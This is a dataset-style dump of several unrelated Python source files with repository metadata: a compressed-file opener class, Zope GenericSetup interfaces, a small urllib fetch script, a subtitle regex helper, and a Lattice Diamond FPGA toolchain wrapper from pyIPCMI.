if 'compresslevel' in arg_names and 'compresslevel' not in kwargs:
kwargs['compresslevel'] = self.default_compresslevel
# Default keep_open hint
if 'keep_open' in arg_names:
kwargs.setdefault('keep_open', False)
# Clear keep_open hint if it is not relevant for the file type
else:
kwargs.pop('keep_open', None)
self.fobj = opener(fileish, *args, **kwargs)
self._name = fileish
self.me_opened = True
def _get_opener_argnames(self, fileish):
_, ext = splitext(fileish)
if self.compress_ext_icase:
ext = ext.lower()
for key in self.compress_ext_map:
if key is None:
continue
if key.lower() == ext:
return self.compress_ext_map[key]
elif ext in self.compress_ext_map:
return self.compress_ext_map[ext]
return self.compress_ext_map[None]
def _is_fileobj(self, obj):
""" Is `obj` a file-like object?
"""
return hasattr(obj, 'read') and hasattr(obj, 'write')
@property
def closed(self):
return self.fobj.closed
@property
def name(self):
""" Return ``self.fobj.name`` or self._name if not present
self._name will be None if object was created with a fileobj, otherwise
it will be the filename.
"""
try:
return self.fobj.name
except AttributeError:
return self._name
@property
def mode(self):
return self.fobj.mode
def fileno(self):
return self.fobj.fileno()
def read(self, *args, **kwargs):
return self.fobj.read(*args, **kwargs)
def readinto(self, *args, **kwargs):
return self.fobj.readinto(*args, **kwargs)
def write(self, *args, **kwargs):
return self.fobj.write(*args, **kwargs)
def seek(self, *args, **kwargs):
return self.fobj.seek(*args, **kwargs)
def tell(self, *args, **kwargs):
return self.fobj.tell(*args, **kwargs)
def close(self, *args, **kwargs):
return self.fobj.close(*args, **kwargs)
def __iter__(self):
return iter(self.fobj)
def close_if_mine(self):
""" Close ``self.fobj`` iff we opened it in the constructor
"""
if self.me_opened:
self.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close_if_mine()
class ImageOpener(Opener):
""" Opener-type class to collect extra compressed extensions
A trivial sub-class of opener to which image classes can add extra
extensions with custom openers, such as compressed openers.
To add an extension, add a line to the class definition (not __init__):
ImageOpener.compress_ext_map[ext] = func_def
``ext`` is a file extension beginning with '.' and should be included in
the image class's ``valid_exts`` tuple.
``func_def`` is a `(function, (args,))` tuple, where `function accepts a
filename as the first parameter, and `args` defines the other arguments
that `function` accepts. These arguments must be any (unordered) subset of
`mode`, `compresslevel`, and `buffering`.
"""
# Add new extensions to this dictionary
compress_ext_map = Opener.compress_ext_map.copy()
|
[
"[email protected]"
] | |
bf3448d849c5de2d925e689c949e860cc37bcc98
|
c4af67db4c523d20f2d55aef90ba77db1fb53c38
|
/GenericSetup/interfaces.py
|
86d238f328d67b4bf37f34be5405172baad75cc7
|
[] |
no_license
|
dtgit/dtedu
|
e59b16612d7d9ea064026bf80a44657082ef45a3
|
d787885fe7ed0de6f9e40e9b05d852a0e9d60677
|
refs/heads/master
| 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 23,918 |
py
|
##############################################################################
#
# Copyright (c) 2004 Zope Corporation and Contributors. All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
""" GenericSetup product interfaces
$Id: interfaces.py 76859 2007-06-20 19:24:38Z rafrombrc $
"""
from zope.interface import Interface
from zope.schema import Text
from zope.schema import TextLine
# Please note that these values may change. Always import
# the values from here instead of using the values directly.
BASE, EXTENSION = 1, 2
SKIPPED_FILES = ('CVS', '.svn', '_svn', '_darcs')
SKIPPED_SUFFIXES = ('~',)
class IPseudoInterface( Interface ):
""" API documentation; not testable / enforceable.
"""
class ISetupEnviron(Interface):
"""Context for im- and export adapters.
"""
def getLogger(name):
"""Get a logger with the specified name, creating it if necessary.
"""
def shouldPurge():
"""When installing, should the existing setup be purged?
"""
class ISetupContext(ISetupEnviron):
""" Context used for export / import plugins.
"""
def getSite():
""" Return the site object being configured / dumped.
"""
def getSetupTool():
""" Return the site object being configured / dumped.
"""
def getEncoding():
""" Get the encoding used for configuration data within the site.
o Return None if the data should not be encoded.
"""
def listNotes():
""" Return notes recorded by this context.
o Result a sequence of (component, message) tuples
"""
def clearNotes():
""" Clear all notes recorded by this context.
"""
class IImportContext( ISetupContext ):
def readDataFile( filename, subdir=None ):
""" Search the current configuration for the requested file.
o 'filename' is the name (without path elements) of the file.
o 'subdir' is an optional subdirectory; if not supplied, search
only the "root" directory.
o Return the file contents as a string, or None if the
file cannot be found.
"""
def getLastModified( path ):
""" Return the modification timestamp of the item at 'path'.
o Result will be a DateTime instance.
o Search profiles in the configuration in order.
o If the context is filesystem based, return the 'stat' timestamp
of the file / directory to which 'path' points.
o If the context is ZODB-based, return the Zope modification time
of the object to which 'path' points.
o Return None if 'path' does not point to any object.
"""
def isDirectory( path ):
""" Test whether path points to a directory / folder.
o If the context is filesystem based, check that 'path' points to
a subdirectory within the "root" directory.
o If the context is ZODB-based, check that 'path' points to a
"container" under the context's tool.
o Return None if 'path' does not resolve; otherwise, return a
bool.
"""
def listDirectory( path, skip=SKIPPED_FILES ):
""" List IDs of the contents of a directory / folder.
o Omit names in 'skip'.
o If 'path' does not point to a directory / folder, return None.
"""
class IImportPlugin( IPseudoInterface ):
""" Signature for callables used to import portions of site configuration.
"""
def __call__( context ):
""" Perform the setup step.
o Return a message describing the work done.
o 'context' must implement IImportContext.
"""
class IExportContext( ISetupContext ):
def writeDataFile( filename, text, content_type, subdir=None ):
""" Write data into the specified location.
o 'filename' is the unqualified name of the file.
o 'text' is the content of the file.
o 'content_type' is the MIMEtype of the file.
o 'subdir', if passed, is a path to a subdirectory / folder in
which to write the file; if not passed, write the file to the
"root" of the target.
"""
class IExportPlugin( IPseudoInterface ):
""" Signature for callables used to export portions of site configuration.
"""
def __call__( context ):
""" Write export data for the site wrapped by context.
o Return a message describing the work done.
o 'context' must implement IExportContext. The plugin will use
its 'writeDataFile' method for each file to be exported.
"""
class IStepRegistry( Interface ):
""" Base interface for step registries.
"""
def listSteps():
""" Return a sequence of IDs of registered steps.
o Order is not significant.
"""
def listStepMetadata():
""" Return a sequence of mappings describing registered steps.
o Mappings will be ordered alphabetically.
"""
def getStepMetadata( key, default=None ):
""" Return a mapping of metadata for the step identified by 'key'.
o Return 'default' if no such step is registered.
o The 'handler' metadata is available via 'getStep'.
"""
def generateXML():
""" Return a round-trippable XML representation of the registry.
o 'handler' values are serialized using their dotted names.
"""
def parseXML( text ):
""" Parse 'text'.
"""
class IImportStepRegistry( IStepRegistry ):
""" API for import step registry.
"""
def sortSteps():
""" Return a sequence of registered step IDs
o Sequence is sorted topologically by dependency, with the dependent
steps *after* the steps they depend on.
"""
def checkComplete():
""" Return a sequence of ( node, edge ) tuples for unsatisifed deps.
"""
def getStep( key, default=None ):
""" Return the IImportPlugin registered for 'key'.
o Return 'default' if no such step is registered.
"""
def registerStep( id
, version
, handler
, dependencies=()
, title=None
, description=None
):
""" Register a setup step.
o 'id' is a unique name for this step,
o 'version' is a string for comparing versions, it is preferred to
be a yyyy/mm/dd-ii formatted string (date plus two-digit
ordinal). when comparing two version strings, the version with
the lower sort order is considered the older version.
- Newer versions of a step supplant older ones.
- Attempting to register an older one after a newer one results
in a KeyError.
o 'handler' should implement IImportPlugin.
o 'dependencies' is a tuple of step ids which have to run before
this step in order to be able to run at all. Registration of
steps that have unmet dependencies are deferred until the
dependencies have been registered.
o 'title' is a one-line UI description for this step.
If None, the first line of the documentation string of the handler
is used, or the id if no docstring can be found.
o 'description' is a one-line UI description for this step.
If None, the remaining line of the documentation string of
the handler is used, or default to ''.
"""
class IExportStepRegistry( IStepRegistry ):
""" API for export step registry.
"""
def getStep( key, default=None ):
""" Return the IExportPlugin registered for 'key'.
o Return 'default' if no such step is registered.
"""
def registerStep( id, handler, title=None, description=None ):
""" Register an export step.
o 'id' is the unique identifier for this step
o 'handler' should implement IExportPlugin.
o 'title' is a one-line UI description for this step.
If None, the first line of the documentation string of the step
is used, or the id if no docstring can be found.
o 'description' is a one-line UI description for this step.
If None, the remaining line of the documentation string of
the step is used, or default to ''.
"""
class IToolsetRegistry( Interface ):
""" API for toolset registry.
"""
def listForbiddenTools():
""" Return a list of IDs of tools which must be removed, if present.
"""
def addForbiddenTool(tool_id ):
""" Add 'tool_id' to the list of forbidden tools.
o Raise KeyError if 'tool_id' is already in the list.
o Raise ValueError if 'tool_id' is in the "required" list.
"""
def listRequiredTools():
""" Return a list of IDs of tools which must be present.
"""
def getRequiredToolInfo( tool_id ):
""" Return a mapping describing a partiuclar required tool.
o Keys include:
'id' -- the ID of the tool
'class' -- a dotted path to its class
o Raise KeyError if 'tool_id' id not a known tool.
"""
def listRequiredToolInfo():
""" Return a list of IDs of tools which must be present.
"""
def addRequiredTool( tool_id, dotted_name ):
""" Add a tool to our "required" list.
o 'tool_id' is the tool's ID.
o 'dotted_name' is a dotted (importable) name of the tool's class.
o Raise KeyError if we have already registered a class for 'tool_id'.
o Raise ValueError if 'tool_id' is in the "forbidden" list.
"""
class IProfileRegistry( Interface ):
""" API for profile registry.
"""
def getProfileInfo( profile_id, for_=None ):
""" Return a mapping describing a registered filesystem profile.
o Keys include:
'id' -- the ID of the profile
'title' -- its title
'description' -- a textual description of the profile
'path' -- a path to the profile on the filesystem.
'product' -- the name of the product to which 'path' is
relative (None for absolute paths).
'type' -- either BASE or EXTENSION
o 'for_', if passed, should be the interface specifying the "site
type" for which the profile is relevant, e.g.
Products.CMFCore.interfaces.ISiteRoot or
Products.PluggableAuthService.interfaces.IPluggableAuthService.
If 'None', list all profiles.
"""
def listProfiles( for_=None ):
""" Return a list of IDs for registered profiles.
o 'for_', if passed, should be the interface specifying the "site
type" for which the profile is relevant, e.g.
Products.CMFCore.interfaces.ISiteRoot or
Products.PluggableAuthService.interfaces.IPluggableAuthService.
If 'None', list all profiles.
"""
def listProfileInfo( for_=None ):
""" Return a list of mappings describing registered profiles.
o See 'getProfileInfo' for a description of the mappings' keys.
o 'for_', if passed, should be the interface specifying the "site
type" for which the profile is relevant, e.g.
Products.CMFCore.interfaces.ISiteRoot or
Products.PluggableAuthService.interfaces.IPluggableAuthService.
If 'None', list all profiles.
"""
def registerProfile( name
, title
, description
, path
, product=None
, profile_type=BASE
, for_=None
):
""" Add a new profile to the registry.
o If an existing profile is already registered for 'product:name',
raise KeyError.
o If 'product' is passed, then 'path' should be interpreted as
relative to the corresponding product directory.
o 'for_', if passed, should be the interface specifying the "site
type" for which the profile is relevant, e.g.
Products.CMFCore.interfaces.ISiteRoot or
Products.PluggableAuthService.interfaces.IPluggableAuthService.
If 'None', the profile might be used in any site.
"""
class ISetupTool( Interface ):
""" API for SetupTool.
"""
def getEncoding():
""" Get the encoding used for configuration data within the site.
o Return None if the data should not be encoded.
"""
def getImportContextID():
""" Get the ID of the active import context.
DEPRECATED. The idea of a stateful active import context is
going away.
"""
def getBaselineContextID():
""" Get the ID of the base profile for this configuration.
"""
def setImportContext( context_id ):
""" Set the ID of the active import context and update the registries.
DEPRECATED. The idea of a stateful active import context is
going away.
"""
def setBaselineContext( context_id, encoding=None):
""" Specify the base profile for this configuration.
"""
def applyContext( context, encoding=None ):
""" Update the tool from the supplied context, without modifying its
"permanent" ID.
"""
def getImportStepRegistry():
""" Return the IImportStepRegistry for the tool.
"""
def getExportStepRegistry():
""" Return the IExportStepRegistry for the tool.
"""
def getToolsetRegistry():
""" Return the IToolsetRegistry for the tool.
"""
def runImportStepFromProfile(profile_id, step_id,
run_dependencies=True, purge_old=None):
""" Execute a given setup step from the given profile.
o 'profile_id' must be a valid ID of a registered profile;
otherwise, raise KeyError.
o 'step_id' is the ID of the step to run.
o If 'purge_old' is True, then run the step after purging any
"old" setup first (this is the responsibility of the step,
which must check the context we supply).
o If 'run_dependencies' is True, then run any out-of-date
dependency steps first.
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
"""
def runImportStep(step_id, run_dependencies=True, purge_old=None):
""" Execute a given setup step from the current
_import_context_id context.
o 'step_id' is the ID of the step to run.
o If 'purge_old' is True, then run the step after purging any
"old" setup first (this is the responsibility of the step,
which must check the context we supply).
o If 'run_dependencies' is True, then run any out-of-date
dependency steps first.
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
DEPRECATED. Use runImportStepFromProfile instead.
"""
def runAllImportStepsFromProfile(profile_id, purge_old=None):
""" Run all setup steps for the given profile in dependency order.
o 'profile_id' must be a valid ID of a registered profile;
otherwise, raise KeyError.
o If 'purge_old' is True, then run each step after purging any
"old" setup first (this is the responsibility of the step,
which must check the context we supply).
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
"""
def runAllImportSteps(purge_old=None):
""" Run all setup steps for the _import_context_id profile in
dependency order.
o If 'purge_old' is True, then run each step after purging any
"old" setup first (this is the responsibility of the step,
which must check the context we supply).
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
DEPRECATED. Use runAllImportStepsFromProfile instead.
"""
def runExportStep( step_id ):
""" Generate a tarball containing artifacts from one export step.
o 'step_id' identifies the export step.
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
'tarball' -- the stringified tar-gz data.
"""
def runAllExportSteps():
""" Generate a tarball containing artifacts from all export steps.
o Return a mapping, with keys:
'steps' -- a sequence of IDs of the steps run.
'messages' -- a dictionary holding messages returned from each
step
'tarball' -- the stringified tar-gz data.
"""
def createSnapshot( snapshot_id ):
""" Create a snapshot folder using all steps.
o 'snapshot_id' is the ID of the new folder.
"""
def compareConfigurations( lhs_context
, rhs_context
, missing_as_empty=False
, ignore_whitespace=False
):
""" Compare two configurations.
o 'lhs_context' and 'rhs_context' must implement IImportContext.
o If 'missing_as_empty', then compare files not present as though
they were zero-length; otherwise, omit such files.
o If 'ignore_whitespace', then suppress diffs due only to whitespace
(c.f: 'diff -wbB')
"""
def getProfileImportDate(profile_id):
""" Return the last date an extension was imported.
o The result will be a string, formated as IS0.
"""
class IWriteLogger(Interface):
"""Write methods used by the python logging Logger.
"""
def debug(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'DEBUG'.
"""
def info(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'INFO'.
"""
def warning(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'WARNING'.
"""
def error(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'ERROR'.
"""
def exception(msg, *args):
"""Convenience method for logging an ERROR with exception information.
"""
def critical(msg, *args, **kwargs):
"""Log 'msg % args' with severity 'CRITICAL'.
"""
def log(level, msg, *args, **kwargs):
"""Log 'msg % args' with the integer severity 'level'.
"""
class INode(Interface):
"""Node im- and exporter.
"""
node = Text(description=u'Im- and export the object as a DOM node.')
class IBody(INode):
"""Body im- and exporter.
"""
body = Text(description=u'Im- and export the object as a file body.')
mime_type = TextLine(description=u'MIME type of the file body.')
name = TextLine(description=u'Enforce this name for the file.')
suffix = TextLine(description=u'Suffix for the file.')
class IFilesystemExporter(Interface):
""" Plugin interface for site structure export.
"""
def export(export_context, subdir, root=False):
""" Export our 'context' using the API of 'export_context'.
o 'export_context' must implement
Products.GenericSupport.interfaces.IExportContext.
o 'subdir', if passed, is the relative subdirectory containing our
context within the site.
o 'root', if true, indicates that the current context is the
"root" of an import (this may be used to adjust paths when
interacting with the context).
"""
def listExportableItems():
""" Return a sequence of the child items to be exported.
o Each item in the returned sequence will be a tuple,
(id, object, adapter) where adapter must implement
IFilesystemExporter.
"""
class IFilesystemImporter(Interface):
""" Plugin interface for site structure export.
"""
def import_(import_context, subdir, root=False):
""" Import our 'context' using the API of 'import_context'.
o 'import_context' must implement
Products.GenericSupport.interfaces.IImportContext.
o 'subdir', if passed, is the relative subdirectory containing our
context within the site.
o 'root', if true, indicates that the current context is the
"root" of an import (this may be used to adjust paths when
interacting with the context).
"""
class IContentFactory(Interface):
""" Adapter interface for factories specific to a container.
"""
def __call__(id):
""" Return a new instance, seated in the context under 'id'.
"""
class IContentFactoryName(Interface):
""" Adapter interface for finding the name of the ICF for an object.
"""
def __call__():
""" Return a string, suitable for looking up an IContentFactory.
o The string should allow finding a factory for our context's
container which would create an "empty" instance of the same
type as our context.
"""
class ICSVAware(Interface):
""" Interface for objects which dump / load 'text/comma-separated-values'.
"""
def getId():
""" Return the Zope id of the object.
"""
def as_csv():
""" Return a string representing the object as CSV.
"""
def put_csv(fd):
""" Parse CSV and update the object.
o 'fd' must be a file-like object whose 'read' method returns
CSV text parseable by the 'csv.reader'.
"""
class IINIAware(Interface):
""" Interface for objects which dump / load INI-format files..
"""
def getId():
""" Return the Zope id of the object.
"""
def as_ini():
""" Return a string representing the object as INI.
"""
def put_ini(stream_or_text):
""" Parse INI-formatted text and update the object.
o 'stream_or_text' must be either a string, or else a stream
directly parseable by ConfigParser.
"""
class IDAVAware(Interface):
""" Interface for objects which handle their own FTP / DAV operations.
"""
def getId():
""" Return the Zope id of the object.
"""
def manage_FTPget():
""" Return a string representing the object as a file.
"""
def PUT(REQUEST, RESPONSE):
""" Parse file content and update the object.
o 'REQUEST' will have a 'get' method, which will have the
content object in its "BODY" key. It will also have 'get_header'
method, whose headers (e.g., "Content-Type") may affect the
processing of the body.
"""
|
[
"[email protected]"
] | |
d7f3500c58054c8e787b5eb8b5ef526a6c1fb2a4
|
a43346f397f55edf1f946bae937ae8ae9e21d955
|
/vscode2/test_urllib.py
|
83d06e098858b90cd428290a2f783d30dd67a847
|
[] |
no_license
|
OSYouth/vscode2
|
130474906566a3e90e9a60f5575b68453b4420ca
|
385f3cc42b84abfdb958d23e56883450b73e5247
|
refs/heads/master
| 2021-10-19T11:22:26.210328 | 2019-02-20T15:19:35 | 2019-02-20T15:19:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 179 |
py
|
import urllib.request as urllib
url = "https://www.baidu.com"
print ('第一种方法')
response1 = urllib.urlopen(url)
print (response1.getcode())
print (len(response1.read()))
|
[
"[email protected]"
] | |
35ed390982090e723108fa49c6bc3eca2fac169b
|
ffeedf288d6aa5302abf1771e23c3090b52d7676
|
/filemapper/metadata/regex/regexsubtitleextension.py
|
ee29654357f444d8fda6bbadb7f510ddf6ff2567
|
[] |
no_license
|
AsiganTheSunk/python-multimedia-filemapper
|
f648577f610467abdb9e1ff43783fd1b8ec5b748
|
5daa07c51f3e85df48a0c336633ac150687fe24c
|
refs/heads/master
| 2022-07-07T10:12:43.066571 | 2017-11-02T01:02:20 | 2017-11-02T01:02:20 | 98,677,659 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,813 |
py
|
import re
from filemapper.utils.fileflags import FileFlags as fflags
class RegexSubtitleExtension():
def __init__(self):
self.name = 'RegexSubtitleExtension'
self.supported_fflags = []
self.supported_season_fflags = []
self.supported_subtitle_fflags = [fflags.SUBTITLE_DIRECTORY_FILM_FLAG,
fflags.SUBTITLE_FILM_FLAG,
fflags.SUBTITLE_DIRECTORY_SHOW_FLAG,
fflags.SUBTITLE_SHOW_FLAG,
fflags.SUBTITLE_DIRECTORY_ANIME_FLAG,
fflags.SUBTITLE_ANIME_FLAG]
return
def get_subtitles_directory(self, stream, debug=False):
'''
This function retrieves the subtitle_directory of the file or directory from the stream using regular expresions
:param stream: It represents the input string you're parsing
:param debug: It represents the debug status of the function, default it's False
:return: SUBTITLE_DIRECTORY
'''
_subtitle_directory_patterns = ['(sub\w{0,6}(?!=\!))']
try:
subtitle_directory = re.search(_subtitle_directory_patterns[0], stream, re.IGNORECASE).group(0)
except AttributeError:
# raise error that would be corrected in ReEngine turning exception into blank field
subtitle_directory = ''
return subtitle_directory
else:
subtitle_directory = 'subs'
if debug:
print('{extension_engine}: {stream} :: {value}').format(
extension_engine=self.name,
stream=stream,
value=subtitle_directory)
return subtitle_directory
|
[
"[email protected]"
] | |
31afddcb16282f0930e0128adb77023409f9431d
|
8581ebb9bd1a8cf5da5d9745a23995d0a2438998
|
/pyIPCMI/ToolChain/Lattice/Diamond.py
|
3fd18ebebbbc07edc6b52672237ba60cdef635a3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Paebbels/pyIPCMI
|
9ab01397d88299173732645bbbab949915ca48b9
|
0f91e26f989ca025c9380ff808d1e532614b9593
|
refs/heads/master
| 2021-06-13T21:43:00.022816 | 2019-10-13T02:48:37 | 2019-10-13T02:48:37 | 94,079,170 | 7 | 4 |
NOASSERTION
| 2021-04-29T20:58:29 | 2017-06-12T09:33:44 |
Python
|
UTF-8
|
Python
| false | false | 12,636 |
py
|
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
#
# ==============================================================================
# Authors: Patrick Lehmann
# Martin Zabel
#
# Python Class: Lattice Diamond specific classes
#
# License:
# ==============================================================================
# Copyright 2017-2018 Patrick Lehmann - Bötzingen, Germany
# Copyright 2007-2016 Technische Universität Dresden - Germany
# Chair of VLSI-Design, Diagnostics and Architecture
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
import time
from pathlib import Path
from subprocess import check_output, CalledProcessError, STDOUT
from lib.Functions import Init
from pyIPCMI.Base.Exceptions import PlatformNotSupportedException
from pyIPCMI.Base.Logging import Severity, LogEntry
from pyIPCMI.Base.Executable import CommandLineArgumentList, ExecutableArgument, ShortTupleArgument, DryRunException
from pyIPCMI.Base.Project import File, FileTypes, VHDLVersion
from pyIPCMI.ToolChain import ToolMixIn, ConfigurationException, ToolConfiguration, OutputFilteredExecutable
from pyIPCMI.ToolChain.GNU import Bash
from pyIPCMI.ToolChain.Windows import Cmd
from pyIPCMI.ToolChain.Lattice import LatticeException
__api__ = [
'DiamondException',
'Configuration',
'Diamond',
'Synth',
'SynthesisArgumentFile',
'MapFilter',
'CompilerFilter'
]
__all__ = __api__
class DiamondException(LatticeException):
pass
class Configuration(ToolConfiguration):
_vendor = "Lattice" #: The name of the tools vendor.
_toolName = "Lattice Diamond" #: The name of the tool.
_section = "INSTALL.Lattice.Diamond" #: The name of the configuration section. Pattern: ``INSTALL.Vendor.ToolName``.
_multiVersionSupport = True #: Lattice Diamond supports multiple versions installed on the same system.
_template = {
"Windows": {
_section: {
"Version": "3.8",
"SectionName": ("%{PathWithRoot}#${Version}", None),
"InstallationDirectory": ("${${SectionName}:InstallationDirectory}", "${INSTALL.Lattice:InstallationDirectory}/Diamond/${Version}_x64"),
"BinaryDirectory": ("${${SectionName}:BinaryDirectory}", "${InstallationDirectory}/bin/nt64"),
"BinaryDirectory2": ("${${SectionName}:BinaryDirectory2}", "${InstallationDirectory}/ispfpga/bin/nt64")
}
},
"Linux": {
_section: {
"Version": "3.8",
"SectionName": ("%{PathWithRoot}#${Version}", None),
"InstallationDirectory": ("${${SectionName}:InstallationDirectory}", "${INSTALL.Lattice:InstallationDirectory}/diamond/${Version}_x64"),
"BinaryDirectory": ("${${SectionName}:BinaryDirectory}", "${InstallationDirectory}/bin/lin64"),
"BinaryDirectory2": ("${${SectionName}:BinaryDirectory2}", "${InstallationDirectory}/ispfpga/bin/lin64")
}
}
} #: The template for the configuration sections represented as nested dictionaries.
def CheckDependency(self):
"""Check if general Lattice support is configured in pyIPCMI."""
return (len(self._host.Config['INSTALL.Lattice']) != 0)
def ConfigureForAll(self):
try:
if (not self._AskInstalled("Is Lattice Diamond installed on your system?")):
self.ClearSection()
else:
# Configure Diamond version
version = self._ConfigureVersion()
if self._multiVersionSupport:
self.PrepareVersionedSections()
sectionName = self._host.Config[self._section]['SectionName']
self._host.Config[sectionName]['Version'] = version
self._ConfigureInstallationDirectory()
binPath = self._ConfigureBinaryDirectory()
self.__CheckDiamondVersion(binPath, version)
self._host.LogNormal("{DARK_GREEN}Lattice Diamond is now configured.{NOCOLOR}".format(**Init.Foreground), indent=1)
except ConfigurationException:
self.ClearSection()
raise
def __CheckDiamondVersion(self, binPath, version):
if (self._host.Platform == "Windows"): tclShellPath = binPath / "pnmainc.exe"
else: tclShellPath = binPath / "pnmainc"
if not tclShellPath.exists():
raise ConfigurationException("Executable '{0!s}' not found.".format(tclShellPath)) from FileNotFoundError(
str(tclShellPath))
try:
output = check_output([str(tclShellPath), "???"], stderr=STDOUT, universal_newlines=True)
except CalledProcessError as ex:
output = ex.output
for line in output.split('\n'):
if str(version) in line:
break
else:
raise ConfigurationException("Diamond version mismatch. Expected version {0}.".format(version))
self._host.Config[self._section]['Version'] = version
def _ConfigureBinaryDirectory(self):
"""Updates section with value from _template and returns directory as Path object."""
binPath = super()._ConfigureBinaryDirectory()
# unresolved = self._template[self._host.Platform][self._section]['BinaryDirectory2']
# self._host.Config[self._section]['BinaryDirectory2'] = unresolved # create entry
defaultPath = Path(self._host.Config[self._section]['BinaryDirectory2']) # resolve entry
binPath2 = defaultPath # may be more complex in the future
if (not binPath2.exists()):
raise ConfigurationException("{0!s} 2nd binary directory '{1!s}' does not exist.".format(self, binPath2)) \
from NotADirectoryError(str(binPath2))
return binPath
class Diamond(ToolMixIn):
def PreparseEnvironment(self, installationDirectory):
if (self._platform == "Linux"):
cmd = Bash(self._platform, self._dryrun, logger=self._logger)
settingsFile = installationDirectory / "bin/lin64/diamond_env"
self._environment = cmd.GetEnvironment(settingsFile, variables="bindir={0!s}/bin/lin64; ".format(installationDirectory))
elif (self._platform == "Windows"):
cmd = Cmd(self._platform, self._dryrun, logger=self._logger)
self._environment = cmd.GetEnvironment()
self._environment.Variables['LSC_INI_PATH'] = ""
self._environment.Variables['LSC_DIAMOND'] = "true"
self._environment.Variables['FOUNDRY'] = str(installationDirectory / "ispFPGA")
self._environment.Variables['TCL_LIBRARY'] = str(installationDirectory / "tcltk\\lib\\tcl8.5")
def GetSynthesizer(self):
return Synth(self)
class Synth(OutputFilteredExecutable, ToolMixIn):
def __init__(self, toolchain : ToolMixIn):
ToolMixIn.__init__(
self, toolchain._platform, toolchain._dryrun, toolchain._binaryDirectoryPath, toolchain._version,
toolchain._logger)
if (self._platform == "Windows"): executablePath = self._binaryDirectoryPath / "synthesis.exe"
elif (self._platform == "Linux"): executablePath = self._binaryDirectoryPath / "synthesis"
else: raise PlatformNotSupportedException(self._platform)
super().__init__(self._platform, self._dryrun, executablePath, environment=toolchain._environment, logger=self._logger)
self.Parameters[self.Executable] = executablePath
class Executable(metaclass=ExecutableArgument):
pass
class SwitchProjectFile(metaclass=ShortTupleArgument):
_name = "f"
_value = None
Parameters = CommandLineArgumentList(
Executable,
SwitchProjectFile
)
@staticmethod
def GetLogFileReader(logFile):
while True:
if logFile.exists(): break
time.sleep(5) # FIXME: implement a 'tail -f' functionality
with logFile.open('r') as logFileHandle:
for line in logFileHandle:
yield line[:-1]
def Compile(self, logFile):
parameterList = self.Parameters.ToArgumentList()
self.LogVerbose("command: {0}".format(" ".join(parameterList)))
if (self._dryrun):
self.LogDryRun("Start process: {0}".format(" ".join(parameterList)))
return
try:
self.StartProcess(parameterList)
except Exception as ex:
raise LatticeException("Failed to launch LSE.") from ex
self._hasOutput = False
self._hasWarnings = False
self._hasErrors = False
try:
iterator = iter(CompilerFilter(self.GetReader()))
line = next(iterator)
self._hasOutput = True
self.LogNormal(" LSE messages for '{0}'".format(self.Parameters[self.SwitchProjectFile]))
self.LogNormal(" " + ("-" * (78 - self.Logger.BaseIndent*2)))
while True:
self._hasWarnings |= (line.Severity is Severity.Warning)
self._hasErrors |= (line.Severity is Severity.Error)
line.IndentBy(self.Logger.BaseIndent + 1)
self.Log(line)
line = next(iterator)
except DryRunException:
pass
except StopIteration:
pass
finally:
if self._hasOutput:
self.LogNormal(" " + ("-" * (78 - self.Logger.BaseIndent*2)))
class SynthesisArgumentFile(File):
def __init__(self, file):
super().__init__(file)
self._architecture = None
self._device = None
self._speedGrade = None
self._package = None
self._topLevel = None
self.Logfile = None
self._vhdlVersion = VHDLVersion.Any
self._hdlParams = {}
@property
def Architecture(self):
return self._architecture
@Architecture.setter
def Architecture(self, value):
self._architecture = value
@property
def Device(self):
return self._device
@Device.setter
def Device(self, value):
self._device = value
@property
def SpeedGrade(self):
return self._speedGrade
@SpeedGrade.setter
def SpeedGrade(self, value):
self._speedGrade = value
@property
def Package(self):
return self._package
@Package.setter
def Package(self, value):
self._package = value
@property
def TopLevel(self):
return self._topLevel
@TopLevel.setter
def TopLevel(self, value):
self._topLevel = value
@property
def LogFile(self):
return self.Logfile
@LogFile.setter
def LogFile(self, value):
self.Logfile = value
@property
def VHDLVersion(self):
return self._vhdlVersion
@VHDLVersion.setter
def VHDLVersion(self, value):
self._vhdlVersion = value
@property
def HDLParams(self):
return self._hdlParams
def Write(self, project):
if (self._file is None): raise DiamondException("No file path for SynthesisArgumentFile provided.")
buffer = ""
if (self._architecture is None): raise DiamondException("Argument 'Architecture' (-a) is not set.")
buffer += "-a {0}\n".format(self._architecture)
